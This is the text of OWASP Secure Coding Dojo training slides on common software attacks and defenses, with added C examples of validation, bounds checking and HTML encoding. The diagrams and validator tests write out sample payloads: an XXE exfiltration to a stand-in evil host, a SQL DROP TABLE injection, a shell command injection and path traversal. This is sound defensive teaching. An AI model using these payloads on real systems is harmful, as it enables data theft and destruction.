Secure Coding for Developer Collaboration Training
Secure Coding Dojo
I. Theory
Agenda
1. Theory: 20 points - 90 minutes
2. Hands on: 16 cases – 60 minutes
  Groups of 2; each group gets 2 cases as distributed in the class.
  Solve statically and dynamically (read the code and run it).
  Write a short report.
3. Presentation of the 16 cases – 160 minutes.
Content Creator
About Secure Coding Dojo
• The Secure Coding Dojo is a platform for delivering and tracking security training for developers. The platform is created for development organizations of all sizes: from university classrooms to large enterprises.
• The open source project is supported by Trend Micro, where it was created as a development training tool.
• Since 2019 the Secure Coding Dojo has been an OWASP project.
Attack-Grams
Common Software Attacks - A Visual Journey
1. Authentication Bypass
Authentication Bypass occurs when the application does not prevent unknown users from accessing restricted functionality.
[Diagram: Regular Users and an Attacker; /login and /restricted; Forceful Browsing]
2. Reliance on Untrusted Inputs
Reliance on Untrusted Inputs occurs when the software uses client side validation or simply stores variables used in a security decision somewhere where an attacker could change them.
[Diagram: Attacker → /restricted; 1. "I'm admin ;)"; 2. "Hello admin!"]
3. Missing/Incorrect Authorization
Missing or Incorrect Authorization occurs when the application does not properly validate roles and permissions, allowing for elevation of privilege.
[Diagram: /login, /limited, /admin; Forceful Browsing; Attacker]
4. Missing Encryption of Sensitive Data
If sensitive data is not protected, a security incident will lead to a full scale data breach.
[Diagram: User → /login; Database table (id, username, password) with row 5164 eve ABCDEFG; Data breach → Attacker obtains user: eve, pass: ABCDEFG]
5. Use of a Broken Crypto Algorithm
Crypto algorithms are continuously put to the test so we must keep them up to date. MD5 is known to be exposed to collisions, when two different files can result in the same checksum.
[Diagram: Secure Server publishes the Expected File Hash (MD5, 1234); Download Server (Not Secure); Man-in-the-middle performs a Collision Attack: MD5(Expected File)=1234, MD5(Malware)=1234; User]
6. Unsalted Hash
If password hashes are not salted attackers can still reverse the password.
[Diagram: User → /login; Database table (id, username, passhash) with row 5164 eve E9A92A2…; Data breach; Attacker looks up Precomputed hashes (value, md5, sha256: ABCDEFG, BB74…, E9A92A2…) and recovers user: eve, pass: ABCDEFG]
7. Password Guessing
A password guessing attack is the simplest type of hack. Lack of account lockout and lack of password complexity enforcement allow such attacks to happen.
[Diagram: Attacker works through Common Passwords (123456, password, …, ABCDEFG) against /login: Try '123456'!, Try 'password'!, Try 'ABCDEFG'!; defenses: Lockout, Complexity, Password Policy]
8. Integer Overflow
Code that makes a security decision based on a comparison is bypassed when a counter exceeds the maximum boundary and resets to negative.
[Diagram: Attacker repeatedly sends Credentials to /login; attempts = 32766; attempts = 32767 (MAX_SHORT); attempts = -32768 (< MAX_ATTEMPTS)]
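Added example (not from the deck): a C model of the counter in attack-gram 8 next to a hardened version. The 16-bit `short` and the 32767 → -32768 wrap are what the slide shows; `MAX_ATTEMPTS = 5`, the struct and the function names are assumptions for the demo.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_ATTEMPTS 5   /* lockout threshold; value assumed for the demo */

/* Vulnerable counter from the slide: a 16-bit signed short. After 32767 the
 * next increment wraps to -32768 (two's complement), which is again
 * "< MAX_ATTEMPTS", so the lockout comparison is bypassed. */
typedef struct { short attempts; } vuln_account;

bool vuln_login_allowed(vuln_account *a) {
    a->attempts = (short)(a->attempts + 1);   /* wraps past SHRT_MAX */
    return a->attempts < MAX_ATTEMPTS;
}

/* Hardened counter: unsigned, 32-bit and saturating, plus an explicit
 * locked flag so the decision never depends on the counter travelling
 * back below the threshold. */
typedef struct { uint32_t attempts; bool locked; } safe_account;

bool safe_login_allowed(safe_account *a) {
    if (a->locked)
        return false;
    if (a->attempts < UINT32_MAX)             /* saturate instead of wrapping */
        a->attempts++;
    if (a->attempts >= MAX_ATTEMPTS)          /* >= : the 5th failure locks */
        a->locked = true;
    return !a->locked;
}

/* Hammer the vulnerable account; return the call number at which it accepted
 * a login again after having been locked, or 0 if it never reopened. */
unsigned long vuln_first_bypass(unsigned long calls) {
    vuln_account v = {0};
    for (unsigned long i = 1; i <= calls; i++)
        if (vuln_login_allowed(&v) && i > MAX_ATTEMPTS)
            return i;
    return 0;
}

/* Same for the hardened account: true if it stayed locked for every call. */
bool safe_stays_locked(unsigned long calls) {
    safe_account s = {0, false};
    for (unsigned long i = 1; i <= calls; i++)
        if (safe_login_allowed(&s) && i > MAX_ATTEMPTS)
            return false;
    return true;
}
```

Running `vuln_first_bypass(70000)` reports the 32768th attempt as the first one accepted again, exactly the wrap the diagram draws.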
9. Download of Code Without Integrity Check
When software is downloaded, especially over an insecure connection, it may be replaced with malware. If an integrity check is not used to verify the file checksum the user will end up executing the replacement.
[Diagram: Download Server (Not Secure) serves Software; Man-in-the-middle swaps in Malware; User]
10. Open Redirect
Sites that allow unrestricted redirects may be leveraged in phishing attacks. The users will trust the first part of the URL, but the site will betray their trust by redirecting to the evil page.
[Diagram: Attacker sends a Phishing E-mail; Regular Users follow www.trusted.good, which redirects to www.evil.bad]
11. Cross-Site Scripting
When sites reflect user input as is, they allow attackers to insert malicious scripts and alter functionality.
[Diagram: Attacker at www.evil.bad; Regular Users at www.trusted.good; Data flows to the Attacker]
12. Cross-Site Request Forgery
Sites with sensitive requests, such as a bank money transfer, must prevent such requests from being hidden within other sites where they will be inadvertently executed by unsuspecting visitors.
[Diagram: www.trusted.good and www.bank.com; hidden /transferMoney request; $$$; Regular Users; Attacker]
13. Upload of Dangerous File
Servers that allow file uploads must prevent executables and scripts from being uploaded by employing a file type whitelist and changing the file name and extension after upload.
[Diagram: www.file.server holding Confidential Docs; Regular Users; Attacker uploads a Malicious Web Script]
14. XML External Entities
Applications that process XML documents must disable processing of external entities. XML External Entities can be used to leak content of files from the host server.
[Diagram: Attacker submits an XML Document that includes the /app/password file as &xxe; and links to http://www.evil.bad/DTD?pass=&xxe;; the XML Processor then requests www.evil.bad/DTD?pass=jmttN9YC4bK]
15. Path Traversal
With Path Traversal, also known as a dot dot slash attack, attackers can abuse a download link to access a file from a private directory.
[Diagram: Regular Users download file.txt; Attacker requests ../../../secret.txt and receives secret.txt]
16. OS Command Injection
OS Command Injection lets attackers piggyback malicious scripts when programs execute shell commands.
[Diagram: Program → Operating System: ping ABC → "ping: cannot resolve ABC: Unknown host"; Attacker supplies host: ABC`evil.sh`, the Program runs ping ABC`evil.sh` and evil.sh executes]
17. SQL Injection
SQL Injection allows attackers to insert arbitrary database commands.
[Diagram: Program → SQL Database Server: SELECT * FROM users WHERE user='jsmith'; Attacker supplies user: jsmith'; DROP TABLE users;--' and the users table is dropped]
18. Insecure Deserialization
Deserialization attacks target applications that accept objects in binary or text format. For the attack to be possible, the application must reference unsafe classes that execute code when deserialized in the program memory. Unfortunately many commonly used 3rd party libraries include such classes.
[Diagram: Book Store; Regular Users send a Book Object; Attacker sends a Command Object that runs evil.sh]
19. Buffer Overflow
Buffer Overflow allows attackers to cross variable boundaries and alter program data and even instructions.
[Diagram: Program; b = AAAA; Attacker writes b: AAAAA, a = Ai!\0]
20. Format String Injection
Format String Injection allows attackers to leak program memory by passing unexpected format strings to the program.
[Diagram: Attacker passes %x; Program calls printf("%x"); secret = 123 is written as 123 to the Log file]
II. HANDS ON
Preventing Software Attacks
The Basic Defenses
16 Cases
The Tip of the Iceberg
[Diagram: the basic defenses]
• Input Validation
• Parameterized Commands
• Safe Memory Management
• Safe functions
• Encrypt Data
• Indirect Object References
• Neutralize Output
Input Validation
• Only allow input that you are expecting
  • Would you let someone in your house if you thought they should not be there?
• Block lists are inefficient
  • Would you maintain a block list of people that cannot come to your house?
  • Block listing is like giving keys to your house to everyone except a few unwanted visitors.
LET'S PLAY, SPOT THE VALIDATION PROBLEM!
Which one of the following code samples has a validation problem?
CASE 1
CASE 1
Answer:……
CASE 2
CASE 2
Answer:
Special Characters Not Needed
• Many parameter types are not intended to contain symbols or punctuation
• Many are not even intended to contain Unicode characters
• Parameters going into database queries such as ID, true/false, asc/desc have an even smaller character set
Character sets shown: Alphanumeric; Alphanumeric + .-_
Input Validation Function Example
A Simple Multi-Purpose Function
isAlphanumOrEx("true")
isAlphanumOrEx("desc")
isAlphanumOrEx("21845816438168")
isAlphanumOrEx("0x0709750fa566")
isAlphanumOrEx("Cr2i7nHq6qiMEs")
isAlphanumOrEx("site.local", '.')
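Added example (not the deck's or the Secure Coding Dojo project's code): a C implementation of the `isAlphanumOrEx` allow-list validator the slide calls, checked against the slide's own inputs and against the injection strings from the attack-grams. The one-argument `isAlphanum` wrapper stands in for C's missing default parameter; both names are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Allow-list validator in the spirit of the slide's isAlphanumOrEx():
 * every byte must be an ASCII letter or digit, or be equal to the single
 * extra character `ex` (pass '\0' to allow no extra character).
 * NULL, empty strings and non-ASCII bytes are rejected: the slide's ID,
 * true/false and asc/desc parameters never legitimately contain them. */
bool isAlphanumOrEx(const char *s, char ex) {
    if (s == NULL || *s == '\0')
        return false;
    for (; *s != '\0'; s++) {
        unsigned char c = (unsigned char)*s;
        if (c > 0x7F)                         /* no Unicode / high bytes */
            return false;
        if (isalnum(c))                       /* "C" locale: [A-Za-z0-9] */
            continue;
        if (ex != '\0' && c == (unsigned char)ex)
            continue;
        return false;                         /* anything else is blocked */
    }
    return true;
}

/* One-argument form matching the slide's isAlphanumOrEx("true") calls. */
bool isAlphanum(const char *s) {
    return isAlphanumOrEx(s, '\0');
}

int main(void) {
    /* constructed inputs: the slide's values, then strings taken from the
     * attack-grams that an allow-list must reject */
    const char *ok[] = { "true", "desc", "21845816438168",
                         "0x0709750fa566", "Cr2i7nHq6qiMEs" };
    const char *bad[] = { "jsmith'; DROP TABLE users;--", "../../../secret.txt",
                          "ABC`evil.sh`", "O'Brien" };
    for (size_t i = 0; i < sizeof ok / sizeof ok[0]; i++)
        printf("%-30s -> %d\n", ok[i], isAlphanum(ok[i]));
    printf("%-30s -> %d (with '.')\n", "site.local", isAlphanumOrEx("site.local", '.'));
    for (size_t i = 0; i < sizeof bad / sizeof bad[0]; i++)
        printf("%-30s -> %d\n", bad[i], isAlphanumOrEx(bad[i], '.'));
    return 0;
}
```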
Attacks Prevented by Input Validation
• Injection
• Path Traversal
• Cross-Site Scripting
• Open Redirect
• Deserialization
• …
How About the Irish?
• Names, comments, articles, free text require quotes:
  • O'Brien, don't, "putting things in quotes"
• While input validation reduces the attack surface, it cannot prevent all attacks
To sum it all up…
• Input Validation reduces the attack surface and prevents many attack types
• Block-listing is a bad practice
• Many input types are alphanumeric
• For those input types that need special characters we need different defenses
CONCATENATION
COMMAND + INPUT = INJECTION
… causes Injection!
CONCATENATION
[Diagram: Command Constant, Parameter 1 Input, Parameter 2 Input → Command Interpreter]
… prevents Injection!
LET'S PLAY, SPOT THE INJECTION!
CASE 3
CASE 3
Answer:
CASE 4
CASE 4
Answer:
ORM Frameworks
• ORM = Object Relational Mapping
• ORM Frameworks keep developers away from SQL Queries
• Popular ORM Framework: Hibernate
[Diagram: Object (Field1 Input, Field2 Input) → Command Constant with Parameter 1 Input, Parameter 2 Input → Command Interpreter]
To sum it all up…
• Parameterized Commands handle situations where hazardous characters are needed
• ORM Frameworks prevent mistakes
Problems with Memory
• Classic Overflow
• Incorrect Calculation of Buffer Size
• Off by One
• Format String Injection
• Use-after-free
Memory Safer Functions
fgets(dest_buff, BUFF_SIZE, stdin);
snprintf(dest_buff, BUFF_SIZE, format, …);
strncpy(dest_buff, src_buff, BUFF_SIZE);
strncmp(buff1, buff2, BUFF_SIZE);
If the BUFF_SIZE argument is larger than the size of the buffer: OVERFLOW!
Check Boundaries
• A simple comparison against a known limit constant can go a long way to prevent serious logical attacks.
• Pay special attention to comparison operators
  • < vs <=: <= can lead to off by one
• Make sure the same constant is used to define buffer size and check boundaries
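Added example (not the deck's code): the bounded copies from the Memory Safer Functions slide written so the size argument is derived from the destination, next to a boundary check that uses the same `BUFF_SIZE` constant. `BUFF_SIZE = 16`, the `record` type and the function names are assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define BUFF_SIZE 16   /* one constant defines the buffer and bounds every check */

typedef struct { char name[BUFF_SIZE]; } record;

/* strncpy variant. The size comes from the destination itself, so it cannot
 * exceed the buffer (the OVERFLOW case on the slide). strncpy does not
 * NUL-terminate when src fills the buffer, so terminate explicitly.
 * Returns true if src fitted, false if it was truncated. */
bool set_name(record *r, const char *src) {
    strncpy(r->name, src, sizeof r->name - 1);
    r->name[sizeof r->name - 1] = '\0';
    return strlen(src) < sizeof r->name;
}

/* snprintf variant: always terminates and returns the length it wanted to
 * write, so truncation is detected from the return value. The user string
 * is passed as an argument, never as the format (no format string injection). */
bool set_name_snprintf(record *r, const char *src) {
    int needed = snprintf(r->name, sizeof r->name, "%s", src);
    return needed >= 0 && (size_t)needed < sizeof r->name;
}

/* Valid indexes are 0 .. BUFF_SIZE-1. Writing `i <= BUFF_SIZE` here would be
 * the off-by-one the slide warns about: one byte past the end. */
bool index_in_bounds(size_t i) {
    return i < BUFF_SIZE;
}

/* Store one byte only after the bounds check passes. */
bool set_byte(record *r, size_t i, char c) {
    if (!index_in_bounds(i))
        return false;
    r->name[i] = c;
    return true;
}

int main(void) {
    record r;
    /* constructed input: 20 'A's, longer than the 16-byte buffer */
    bool fit = set_name(&r, "AAAAAAAAAAAAAAAAAAAA");
    printf("fit=%d stored=\"%s\" len=%zu\n", fit, r.name, strlen(r.name));
    printf("index 15 in bounds=%d, index 16 in bounds=%d\n",
           index_in_bounds(15), index_in_bounds(16));
    return 0;
}
```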
Memory Injection?
• Format String Injection is a type of memory flaw caused by allowing user input in a format parameter.
LET'S PLAY, SPOT THE MEMORY PROBLEM!
CASE 5
CASE 5
Answer:
CASE 6
CASE 6
Answer:
CASE 7
CASE 7
Answer:
CASE 8
CASE 8
Answer:
To sum it all up…
• Safer functions allow limiting the number of bytes read into the buffer
• Even with safe functions, special attention should be paid to the size specified; it is very important to use constants to prevent mistakes
• Do not allow user input in format strings
• Careful with the <= operator
Securing Data
• The General Data Protection Regulation (GDPR) has put additional emphasis on maintaining the security and privacy of data
• Data should be transmitted and stored securely
• Cryptography is one critical way to achieve this mandate
  • Secure protocols: TLS 1.2, TLS 1.3
  • Secure ciphers: ECDHE
  • Strong digital signatures: SHA-2
  • Reject invalid certificates and, even more, enforce certificate pinning
  • Strong authenticated symmetric encryption in transit and at rest: AES 256 GCM
• Other ways:
  • Anonymize private data
  • Do not collect or send private data
  • Short data retention
  • Ensure customer control over their own data
LET'S PLAY, SPOT THE DATA BREACH!
CASE 9
CASE 9
Answer:
CASE 10
CASE 10
Answer:
CASE 11
CASE 11
Answer:
To sum it all up…
• Avoid collecting data about individuals
• Pseudonymize the data. Strong salted hashes can be used, or key data can be replaced with *
• Use strong cryptographic algorithms
• All communication should be encrypted.
• Data classification is risky, so when in doubt, encrypt all data
Protect the Web UIs
• Enterprise applications are using Web UIs
• HTML is good looking, platform independent and powerful
• JavaScript libraries such as jQuery, React and Angular make
UIs responsive and versatile
Cross-Site Scripting (XSS)
• The ability to inject arbitrary JavaScript into a web page
  • Reflected
  • Stored
  • DOM based
• Easy to introduce
• Easy to find
• Leads to data breaches through spoofing attacks
Defending against XSS
• Input validation ;)
• Neutralize Output
  • Server Pages -> HTML Encoding (Escaping)
    • < becomes &lt;
    • > becomes &gt;
    • " becomes &quot;
  • JavaScript (DOM XSS)
    • Dangerous Attributes
      • innerHTML
      • src
      • onLoad, onClick, etc…
    • Dangerous Functions
      • eval
      • setTimeout
      • setInterval
HTML Encoding Neutralizes XSS
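Added example (not from the deck): a C HTML encoder for the server-page escaping described above, covering < > " and the single quote the summary says also needs encoding, plus the ampersand so the output cannot be re-read as an entity. Function names and the constructed test input are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* HTML-encode `in` into `out` (capacity `out_size`). Characters that can
 * break out of HTML text or a quoted attribute become entities; everything
 * else is copied as is. Returns false if `out` is too small (the output is
 * then a valid, truncated, NUL-terminated string rather than an overflow). */
bool html_encode(const char *in, char *out, size_t out_size) {
    size_t used = 0;
    if (out_size == 0)
        return false;
    for (; *in != '\0'; in++) {
        char one[2] = { *in, '\0' };
        const char *rep;
        switch (*in) {
            case '&':  rep = "&amp;";  break;
            case '<':  rep = "&lt;";   break;
            case '>':  rep = "&gt;";   break;
            case '"':  rep = "&quot;"; break;
            case '\'': rep = "&#39;";  break;   /* &apos; is not in HTML 4 */
            default:   rep = one;      break;
        }
        size_t n = strlen(rep);
        if (used + n >= out_size) {              /* keep room for the NUL */
            out[used] = '\0';
            return false;
        }
        memcpy(out + used, rep, n);
        used += n;
    }
    out[used] = '\0';
    return true;
}

/* True when the encoded text holds no raw markup-significant byte, i.e. a
 * browser can only render it as text, never as a tag or attribute break. */
bool is_neutralized(const char *encoded) {
    return strpbrk(encoded, "<>\"'") == NULL;
}

int main(void) {
    /* constructed reflected input: a script tag and the Irish name from the deck */
    char out[128];
    html_encode("<script>alert('xss')</script> O'Brien", out, sizeof out);
    printf("%s\n%s\n", out, is_neutralized(out) ? "neutralized" : "NOT neutralized");
    return 0;
}
```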
LET'S PLAY, SPOT THE XSS!
CASE 12
CASE 12
Answer:
CASE 13
CASE 13
Answer:
CASE 14
CASE 14
Answer:
CASE 15
CASE 15
Answer:
To sum it all up…
• XSS is easy to introduce and easy to find
• Encoding should be applied to all server side generated content.
• Additional encoding of single quotes is required
• Dangerous HTML contexts should be handled with care or avoided
Indirect Object References
[Diagram: identifiers 2 and 3]
LET'S PLAY, SPOT THE PATH TRAVERSAL!
CASE 16
CASE 16
Answer:
To sum it all up…
• Reduce the attack surface by enforcing access to objects through identifiers rather than their actual representation
• Identifiers can be input validated more easily and also solve encoding issues
Image Credits
• Image and base design elements courtesy of Pixabay.com – Royalty Free Images (Free for commercial use, No attribution required)
• Although crediting is not required we really want to thank the artists:
  • 8212733 - https://pixabay.com/photos/woman-laptop-business-blogging-3190829/
  • Janson_G - https://pixabay.com/photos/knight-crusader-isolated-2939429/
  • mohamed_hassan - https://pixabay.com/photos/europe-gdpr-data-privacy-3256079/
  • Pexels - https://pixabay.com/photos/coding-computer-hacker-hacking-1841550/
  • Photo Mix - https://pixabay.com/photos/house-keys-key-the-door-castle-1407562/
  • PublicDomainPictures - https://pixabay.com/photos/board-card-chip-computer-data-22098/
  • MTZD - https://pixabay.com/vectors/icon-file-extension-document-2488093/
  • Stux - https://pixabay.com/photos/black-board-chalk-traces-school-1072366/
  • StruffelProductions - https://pixabay.com/photos/code-programming-love-computer-3078609/
  • TeroVasalainen - https://pixabay.com/photos/question-mark-hand-drawn-solution-2123969/
• Attack-Grams created by Paul Ionescu and distributed through the Secure Coding Dojo project